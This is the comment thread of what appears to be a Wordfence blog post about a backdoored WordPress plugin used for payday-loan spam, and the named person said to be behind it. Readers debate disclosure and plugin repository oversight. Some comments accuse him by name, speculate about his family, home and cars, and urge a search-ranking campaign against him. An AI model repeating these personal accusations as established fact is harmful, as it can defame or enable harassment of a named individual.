The worst part about the Jan Dembowski's attitude/rant is it goes against how the WordPress project is marketed. At front and center of WordPress.org is "Meet WordPress: WordPress is open source software you can use to create a beautiful website, blog, or app." His blog post seems to indicate it really should say "Meet WordPress: WordPress is open source software [with the help of a technically competent individual that] you can use to create a beautiful website, blog, or app." Regardless of how Dembowski wants the mission statement of WordPress.org to require users to take the responsibility, that isn't what is stated and doesn't excuse forum administrators putting a chilling effect on security reports from people like David Law. Regardless of how much the community tries to take responsibility itself, if they are told to shut up then eventually those that are trying to do the right thing will just give up trying. Also saying the forum administrator performed those actions for free is not helpful. There is still a cost to the community regardless.

Bottom line: who the current plugin owner is and take-down history need to be more transparent! Any attitude that end-user responsibility can replace that is just offensively misguided.

Joel James September 13, 2017 at 10:32 pm • Reply

Hey Mark,

Thank you for following up. I have replied to your email yesterday. Could you please check? I have something to share which will help you with your investigation.

Mark Maunder September 14, 2017 at 10:13 am • Reply

Have replied. Thank you so much Joel, you shared valuable insight. Trying to get you on Skype now.

Reported September 14, 2017 at 1:44 am • Reply

I have reported his online pharmacy company to both the UK pharmacy regulator and medicines regulator. If he is involved in cyber crime then he is not a fit and proper person to handle sensitive medical records.

James September 14, 2017 at 2:01 am • Reply

Wow! Seriously impressive detective work. Great stuff!

Wisdo September 14, 2017 at 2:25 am • Reply

Lol, its worth premium just for these blogposts.

Mikey September 14, 2017 at 2:41 am • Reply

Just read this, what a scumbag, thanks Mark for outing this crook

Rhys September 14, 2017 at 3:53 am • Reply

Is any of this illegal? It all sounds very criminal.

Shouldn't the police be involved?

Kevin S September 14, 2017 at 4:31 am • Reply

To be honest this is the first article I have read fully. Your guys have done great research. I hope that he gets wiped off entire Internet from good.

bekspees September 14, 2017 at 4:43 am • Reply

starts to look like a soapy :-)

keep up the good work!!

Daragh September 14, 2017 at 5:07 am • Reply

What a can of worms you just lifted the lid on Mark, I commend you.

Lets not forget what this actually is... a fascinating insight into the SEO underworld. This guy went straight for the jugular, highjacking thousands of websites by injecting spam content into them with contextual anchor links back to https://www.paydayloansnow.co.uk.

Google search spam team enemy #1.

If we check Majestic link analysis tool we can see he has links on highly authoritative site, including Government .gov and .edu sites even NASA:
spaceflightsystems.grc.nasa.gov
morriscountynj.gov
cce.qld.edu.au
teca-print.com

Some links are showing as being deleted on 12th / 13th September but wayback machine shows him in action - https://web.archive.org/web/20170801063611/https://morriscountynj.gov/

If guys like Mason Soiza can just buy a plugin and release an update with a backdoor, is wordpress safe at all anymore? WordPress have to take notice and be proactive in the defence of online criminals.

Jansie Blom September 14, 2017 at 6:28 am • Reply

Such an interesting post. Like reading Arthur Conan Doyle.

Well done on uncovering Soiza.

Seems he deleted his Facebook account. The water might be get a little too warm for him after you've opened this can of worms.

Donna Cavalier September 14, 2017 at 6:34 am • Reply

Like the others commenting here, I found this to be an interesting read, and think you did a great job of ferreting out the information. I do have one negative comment to make though. It seems odd that in the first post, the day before this one, it said at the end,

"I would also ask you to not start any witch hunts. I’m sure some folks are angry about what transpired here, but things happen..."

And then the next day, this guy's entire life is exposed for the world to see. I mean, he deserves it, no doubt. But it almost sounds like you wanted to reserve the witch hunt for yourself.

I'm probably over-reacting, and there was probably no underlying weird connection between the "don't start a witch hunt" request, and the subsequent self-started witch hunt, but it definitely made me say "hmmmm".

Regardless, this was soap-opera worthy reading material.

Mark Maunder September 14, 2017 at 8:15 am • Reply

Hi Donna,

I don't have a problem with you witch hunting malicious actors. It's what we do all day long in information security.

My concern was that the community would go after the WordPress plugin repository maintainers and the forum moderators. That happened in August of last year when we reported the "404 to 301" debacle and it created much unhappiness and additional work on their part. So I was kindly requesting that our community refrain from doing that. It looks like we managed to avoid that this time and other news outlets like Bleeping Computer were kind enough to echo our request.

https://www.bleepingcomputer.com/news/security/backdoor-found-in-wordpress-plugin-with-more-than-200-000-installations/

(See last paragraph)

Regards,

Mark.

Jennifer Hoffman September 21, 2017 at 1:40 pm • Reply

I don't think that the WordFence team wanted to reserve the great reveal for themselves. They had the data and research supporting their findings that other people did not have. Rather than dumping their findings at one time, they went through a vetting process that secured their story so they could not be accused of libel or trolling or defamation of character. UK laws on these issues are much stricter than those in the US.
And Mark appropriately put out the 'no witch hunt' comment because he didn't want to accuse someone before he had definitive proof. This is not doxxing, Mason Soiza is a criminal and he needs to be exposed, jailed, fined, and maybe his Ferrari sold and the proceeds donated to do good works in the world?
Good job Mark & Wordfence team, I love your product and am a faithful user. Wordfence is the first plugin I add on every Wordpress site.

Mark Maunder September 21, 2017 at 1:55 pm • Reply

Thanks Jennifer. Yes, the posts did get published in real-time. We never had any intention of turning this into a series and didn't know where the investigation would take us when we did the first post.

Silvia September 14, 2017 at 6:46 am • Reply

The author of Slimstat Analytics, Jason, has answered a related question here hours ago: https://wordpress.org/support/topic/issues-unrelated/#post-9496649
I hope your article will be updated soon, he says he´s in contact already. Seeing he´s pretty active in supporting his plugin on wordpress.org, I´m not sure why it was so hard to contact him, if necessary, right there in support forum as other users did after reading this article here ....

Mark Maunder September 14, 2017 at 8:12 am • Reply

I'm trying to establish the facts I posted in a reply here.

Jason Crouse September 14, 2017 at 8:28 am • Reply

Thank you, Silvia. We are offering Mark and his team all the collaboration they need. Hopefully this matter will be clarified ASAP.

Mark Maunder September 14, 2017 at 10:14 am • Reply

Hi. You need to urgently reply to the linkedin message I sent you. The data at this point does not look good. I need to verify your identity.

Jason Crouse September 14, 2017 at 7:01 am • Reply

Dear Mark,

good morning! I'm one of the two team members behind Slimstat. My job is to offer support for our product both on http://support.wp-slimstat.com and on the official support forum over at WP.com. You can imagine my surprise this morning when I opened my support mailbox, as I usually do every morning, and I found many emails from alarmed users mentioning this article.

I'm surprised that, while you did a great job at tracing the whereabouts of that other person, you did not consider the consequences of mentioning WP Slimstat WITHOUT checking with us first. As you can understand, this will be a big hit for our image and reputation. I would like you to post an addendum to your article to do some damage control, as people might not bother to read my comment. As you will see on our support forum and by looking at all our reviews, we strive to stand behind our product, and although we cannot go to places that sell drinks at $16 a pop, we feel like we are contributing to improving the WordPress ecosystem, and that is worth much more than money.

Please note: we are the only committers to the WP repository, and you can rest assured that our software is safe to use and doesn't include any malicious code.

I would like you to kindly remove any reference to our software as soon as possible, since it's becoming a big concern for our users. Please don't hurt our fragile business model. This is not what we deserve after ELEVEN years maintaining Slimstat.

I look forward to hearing from you and your team.

Jason

Mark Maunder September 14, 2017 at 8:10 am • Reply

Got your email with the additional data you shared. Thanks. I'm pasting my reply to you here:

*snip*

The only mention in our post of Slimstat is in the context of Soiza claiming he purchased it.

What I do know is that Soiza appears to be a pathological liar.

I should also point out that we are merely reporting the facts.

I need a few items of information from you.

1. I need proof that you are not Soiza.

2. Once we have established that, I need to know if you sold your plugin.

3. If you did not sell your plugin, I'd like to know if you were contacted by Soiza and what the nature of the communication was.

As you can tell, two other plugin authors have worked closely with me and we have managed to rebuild their credibility and the credibility of their plugins very quickly through transparency. If you're happy to work with me then we can do the same.

The alternative is that we have no data we can work with, merely the claims that I received from you this morning via email.

Unfortunately you can't simply demand that I put content on our blog. You're going to have to work with me to help us both establish what the facts are and once I feel we know what those are with a high degree of confidence, we can report them.

Kind regards,

Mark Maunder.

Jason Crouse September 14, 2017 at 8:23 am • Reply

Dear Mark, I understand where you're coming from. You know how to get in touch with me now. I'm more than happy to collaborate and provide all the information that you need to solve this matter.

Mark Maunder September 14, 2017 at 10:14 am • Reply

You need to urgently contact me via LinkedIn. I'm trying to verify your identity. The data at this point does not look good.

James September 14, 2017 at 8:04 pm • Reply

Mark - where are your thoughts now on Slimstat? Did Jason provide you what you needed? Thanks!

Mark Maunder September 14, 2017 at 10:06 pm • Reply

More soon.

MGmirkin September 18, 2017 at 12:25 pm • Reply

How soon? S'been 4 days...

And do we need to be concerned about the WP-Slimstat (AKA, Slimstat Analytics) plugin in the interim? Have you guys analyzed / audited it?

We use it, and I'd like to be sure we're not in some manner potentially compromised with spam or backdoors, etc. From earlier it sounded like it perhaps wasn't targeted like the others. just want to make sure.

Mark Maunder September 18, 2017 at 2:03 pm • Reply

More to come tomorrow morning at the latest.

Mark.

Lindsay September 21, 2017 at 3:41 pm • Reply

Any further update?

Mark Maunder September 21, 2017 at 7:23 pm • Reply

Yup. Read the follow-up blog post. Linked at the top. That's all the updates we have for now.

Lindsay September 22, 2017 at 12:45 am • Reply

Thank you - Top Job

Tamara September 14, 2017 at 7:25 am • Reply

Outstanding detective work! Thank you for going above and beyond to expose how these things happen and who's doing it. This is just one of the reasons I recommend people install Wordfence.

Scott Hendison September 14, 2017 at 8:20 am • Reply

GREAT investigative journalism here, and it's what keeps us as paid subscribers to WordFence. thank you SO much on behalf of the entire WordPress community...

Ronan September 14, 2017 at 8:51 am • Reply

Great work Mark for alerting us about this. Another important reminder for all WordPress users to check the origin of all source code before you install.

Reminds me of some years back using some of those "free" WP themes websites which had embedded encrypted spammy code hidden in the footer and if you removed it, it disabled the theme layout.

Mike Davis September 14, 2017 at 10:19 am • Reply

Very impressive detective work, and much appreciated. Thanks, Mark!

Daryl Austman September 14, 2017 at 10:42 am • Reply

You and your team have done some amazing work here and it is so very comforting to know that I am a user/believer of your plugin. Thanks for this incredible and almost unbelievable investigative reporting.

I'm extremely curious as to the control and viability of the plugin "wp-slimstats" as I use that on most of my 80+ WP sites. I'm waiting with bated breath for some news on that one.

Also, I have to say that the comments on this post are almost as intriguing and interesting as the full story... what a whirlwind of excitement this is!

Thanks again for being the ethical, quality company you are that is continuously looking after the best interests of your customers and the WP public in general.

Pierre September 14, 2017 at 10:51 am • Reply

I used to regularly use this plugin (before the change in ownership). While developing a site a few months ago I noticed the plugin was delisted from the plugins directory.

I did some investigation and found information about the spammy links.

However I view this as a major problem with the plugins directory. If they delist a plugin for security reasons THE PAGE SHOULD STAY UP IN THE DIRECTORY WITH A NOTICE/WARNING TO USERS!!!!!!, as well as display a notice in the wordpress dashboard/plugins page letting users know the same.

The way things work now is the plugin simply disappears. I have developed over 100 sites using the original version of the plugin.

Mark September 14, 2017 at 2:55 pm • Reply

Thanks for this brilliant article exposing these horrendous activities

As a Brit, and as someone who used the Display Widget plugin on a client's website who feels cheated and abused (though I am not aware of any bad incidents occurring through my sites) I felt obligated to try to report this to the National Fraud Intelligence Bureau at http://www.actionfraud.police.uk.

However, as I went through the long reporting form answering the questions, I thought that I would not be the appropriate person to report this. It really needs to be someone affected by a crime or the person who has first hand collected evidence of a crime. All I could have done is linked to this post and I don't think that is enough for the report.

I understand the reluctance to initiate a report and to wait to be contacted by British authorities.

I really hope, however, that somebody is able to bring this person to the attention of the British police. He seems like an altogether odious person who will most likely go on to find other ways of abusing people unless he is stopped and brought to account by the law.

Perhaps, if there is somebody out there in the British mainstream IT press, or someone who has contacts there, and reads this article, they would know better how to bring this matter to the attention of the British legal system.

Whether or not that happens, long may this person's name be associated through this site with his nefarious deeds (at least until he shows some remorse and evidence of a change of heart).

In that regard, I would like people to link to this article, preferably using this person's name or business names in the link text, so that whenever his name or business is searched for, this page comes up as the first result. Hopefully, then, people will be warned off doing any business with him again.

Thanks again for your help, Wordfence!

Mark Maunder September 14, 2017 at 5:16 pm • Reply

Hi Mark,

Thanks. We've already reached out to the UK authorities. If this needs to become a criminal matter they'll run with it.

Mark.

R. Lynn September 14, 2017 at 3:26 pm • Reply

We've been debating a move for the majority of our clients to one security plugin, and Wordfence has obviously been on the table... Seeing the amount of effort you all put into your work, and into informing the WordPress community as well, is really really impressive.

Safe to say I'm tabling the discussion and buying a Wordfence license now. Thanks so much for all the hard work! You're a damn inspiration.

Dmitry September 14, 2017 at 4:49 pm • Reply

I have this plugin installed!!! I just read about this should the plugin be deleted? the plugin is useful to me but if it poses a risk then I will delete it I have wordfence installed but don't recall getting any warning about it but then again I don't read all the emails newsletters from WF.

Please advise

Thanks.

Robert Went September 14, 2017 at 5:23 pm • Reply

Hi have to say, I did laugh when I read some of the blackhat forum posts from this guy.
Telling Rand Fishkin he knows nothing about SEO and all the aftermath, but I sure hope he loses everything from his ill-gotten gains.

From a developer living in the same area and always striving to help clients and keep them on the right side of the law when they suggest some dubious marketing techniques, I find it disgusting to see the life he is living by ruining the lives of others.

Here's wishing karma hits him straight in the face and he ends up a guest at her Majesties pleasure.

James September 14, 2017 at 5:54 pm • Reply

To be honest I used to work in Lead Generation industry and quit few years ago as competitors had no ethics. There were few 'significant players' who were making lots of money using similar methods, playing hard ball. Even big companies you know from TV advertising hired similar hotshots.. can give names but comparison websites. The most hacked plugins were bough or developed and code was injected in pretty the same time to produce them mlns of links, from high pr sites or edu sites.. (education sites :) have 'high authority' from SEO poin of view). Because of lead prices and high conversions for PDL this was one of the popular niche. Then sites would be 'burned' after 2 weaks in average. Then they would hijack traffic from people websites using headers and excluding robots... Anyway, it's long story. The bottom line is to check plugins if you can, possibly manually. Often social sharing plugins are targeted, analytics related because it's pretty easy to hide the code in there..
So if you run site make sure you update site but be extra careful with plugins, see change log at least and use security plugin... ie. Wordfence. Also check your logs time to time, take effort to learn basics.

Re consequences - there is plenty of places where guy can sell his leads and believe me often lead buyers don't care or pretend don't know where the leads are coming from. The right route would be complain to IFA authorities but this is also often long way and useless.
It's quick money on these and you need to have no ethics if you want to win in popular niche.

TBH I'm surprised that these methods still work after couple of years.

Peter September 14, 2017 at 5:57 pm • Reply

I love how various websites reinterpret the facts :-)

https://www.scmagazine.com/malicious-wordpress-plugin-installed-backdoor-on-200000-websites/article/688878/

Every other sentence of this post contains false claims. Hilarious.

Mark Maunder September 14, 2017 at 10:08 pm • Reply

It's a catastrophe. I DM'd the author via twitter. No reply.

David Norwood September 14, 2017 at 11:33 pm • Reply

Mark. Do you have any information on needing to check sites that had the compromised Display Widgets on their site. Where should one look?

Richard Lake September 15, 2017 at 3:41 am • Reply

I've often thought for a long time that the very most popular WordPress plug-ins need to somehow be insulated from things like these. Perhaps Automattic should have a top-tier of developers and plug-ins that must practice x, y and z to be included on a preferational list of some kinds. 'Go to' plug-ins need to be protected.

Jan Dembowski September 15, 2017 at 4:17 am • Reply

Hi Mark and Wordfence folks,

This has been a good read and I want to chime in on 2 points. Please forgive me, I'm about to break my own rule of "Comments (and forum posts) are not your blog." 700 plus words. Sheesh.

First point, disclosure.

You did great detective work. While I think it would have been more prudent to withhold this post, this is your site and you did the work. Releasing this information was your call and I honestly don't fault you for that.

This scammer and his ilk are like "It's over 9000!" sock puppets and I really don't like those. Good job. Raises coffee mug in salute*

I say prudent because I think this package should have been wrapped up and reported to law enforcement as part of legal discovery. IANAL but those that know, know that several laws almost certainly have been broken by this scammer. Delivering this discovery without publicly disclosing it is what security companies do all the time.

Months later you do get to publicly disclose it and your participation when charges are filed by the appropriate prosecution. You get serious security street cred that way.

That way is not sexy, it's not good marketing but it is responsible and Very Bad People™ get charged. Hopefully. That sort of long term thinking really does protect the innocent users and that's the end goal.

Reporting it in a blog post like this is the online equivalent of catch and release.

It's not for law enforcement to contact Wordfence. You know that's not how it works. I'm also aware that you know the process, the how and the who to contact to report this criminal activity.

BUT! Again, you did the work and you get to report it on your site as you see fit. Seriously, good work and congratulations.

Second point: I want to address Ben's comment above. It's based on some misunderstandings.

I'm not WordPress. I'm not on the plugins team, I'm on the Support Team. The plugins team works their tuckus off and they've a much bigger job.

(This comment and long essay represents just my opinion only and not any representative of any group I am part of. I'd hope that's apparent but here we are.)

My personal site represents my opinions only. For someone to follow me from the forums, leave a comment picking a fight with me about this plugin situation on a post about user responsibility is silly. Someone followed me from the forms and I deleted the comment on my site.

Months ago, someone raised a privacy problem with this plugin in the forums. That was looked at by the plugins team and at that time it was determined that that wasn't a violation of the plugin guidelines. Those guidelines are basically an Acceptable Use Policy (AUP) for being allowed to host your code on WordPress.

Before anyone loses it in reply to this, that privacy problem was NOT the malicious back door code. Different problem and holding that up and saying "See? See?" just mis-represents what happened back then. Mark's timeline covers that, read it. It's a good read.

With one or two exceptions, all of WordPress.org is staffed by unpaid volunteers. That's not an excuse, that's not "blame", that's how it is. There are over 50,000 plugins to review. Do a little math, it's statistically likely that this will happen again.

What's remarkable is that it doesn't happen more often.

Please don't @ me for that comment. The plugins team works hard for WordPress users and effectively. Is it perfect? Of course not. Nothing involving real human beings ever is.

Drinks coffee

Hey, it's fine when users get indignant and very angry about what happened. This event with this plugin Sucks Wind Loudly all around. But if you're a WordPress user please consider getting involved in ways that work.

Just saying "how little WordPress did (they did a lot BTW)" or "I can't believe his attitude (on his personal site)" isn't doing anything useful. Go to a Wordcamp, go to a meetup (online or in person), suggest ideas, provide feedback. Get ready to do the work.

Or as I ended off on my blog post: "Don’t accept blame for what happens to your WordPress site. Take responsibility instead." That also applies to anyones participation in our swell community. Problems are made by people, they're also solved by other people. Let's work together and out a way to improve the communication all around that works and is practical.

Mark Maunder September 15, 2017 at 8:31 am • Reply

Thanks Jan. Lots happening on the back-end you're not aware of. Watch this space. We appreciate your work as forum mod. :-)

Ben September 15, 2017 at 7:13 am • Reply

It would be neat if plugin authors could pay a fee to a reputable web security company (like Wordfence, Securi or someone) to review their code and give them a badge or rating on Wordpress.org/ plugin download page.

A unique / separate security rating system at Wordpress.org would help.

Bijay Gupta September 15, 2017 at 11:50 am • Reply

Nice..For me this is called a Research...a Detective work.

Thanks for the Insights which will help out every curious Webmasters.

Great Work Mark & WORDFENCE Team.

Anca September 15, 2017 at 4:15 pm • Reply

Thank you for this update, and for everything you do. The story gets more and more like a thriller every day.

Rupert Hussey September 15, 2017 at 5:35 pm • Reply

Friggin' first rate research and reporting. Premium service at its best. Thank you Mark and team!

Andy Renals September 15, 2017 at 11:49 pm • Reply

Week in week out you and your team do great work Mark. As one of those people yet to commit to your paid service I am really thankful. This article adds kudos and brings me closer to joining.

Puru September 16, 2017 at 11:43 pm • Reply

Mason has been Sherlocked! This is quality detective work!

Eric September 19, 2017 at 2:05 pm • Reply

Just unreal! Great job of digging up dirt on this guy.

Pete F September 20, 2017 at 8:33 am • Reply

You overlooked the racehorse, jointly owned with his father Joe Soiza who is (or was) also a director of at least one of Mason's companies. This looks like a family business, and I don't think Mason is the brains of the outfit. He just seems to like the things that large amounts of money can buy. Perhaps dabbling in fake pharma, gambling (casinos were mentioned) and unsecured loans - very high rates of interest, but all perfectly legal - helps pay the bills.

https://www.racingpost.com/profile/owner/253835/joe-soiza-mason-soiza/horses

Mark Maunder September 20, 2017 at 9:56 am • Reply

Thanks Pete. We didn't. Also didn't overlook a lot of other facts that weren't WP relevant. We also have confidential sources and data we can't or chose not to share.

Jen September 26, 2017 at 8:00 am • Reply

Well he (not his father) owns that property which his company Soiza Limited is registered to (Jubilee Cottage), which he bought for a fat £777k in December 2016. So he can't be doing too badly himself.

em September 26, 2017 at 11:14 pm • Reply

According to my boyfriend who trained at the same gym, they own a fleet of high end sports cars.
Lamborghinis, Ferraris, Mercedes and more in the space of a couple of years . Rather like a rag to riches success story! Sickens you to think how hard you have to work in Seo when being honest.

HONEST GUV September 20, 2017 at 1:27 pm • Reply

I think this is one of the best exposures I have seen after many years of dealing with online fraud. Fabulous tracking all this down. These criminals often try to hide however and have aliases and fake profiles that can be woken at any time and while you can't see his obvious profiles anymore he has not shut shop and run, and he has merely hidden them for now and will wake them briefly to keep them alive. It is absolutely certain he is up and running again and business continues as usual. Scammers never cease their fund raising activities and education and awareness, such as shown above, is always the solution.

jim September 22, 2017 at 7:35 am • Reply

This is despicable and should be investigated by the UK police. It made a great read keep up the good work. I do hope it has been reported?

Chris Haines September 26, 2017 at 12:26 pm • Reply

Fantastic read, the level of detective work in this post is impressive.

Get the latest WordPress security updates and news

Sign up for WordPress security alerts, Wordfence product updates and security news via email.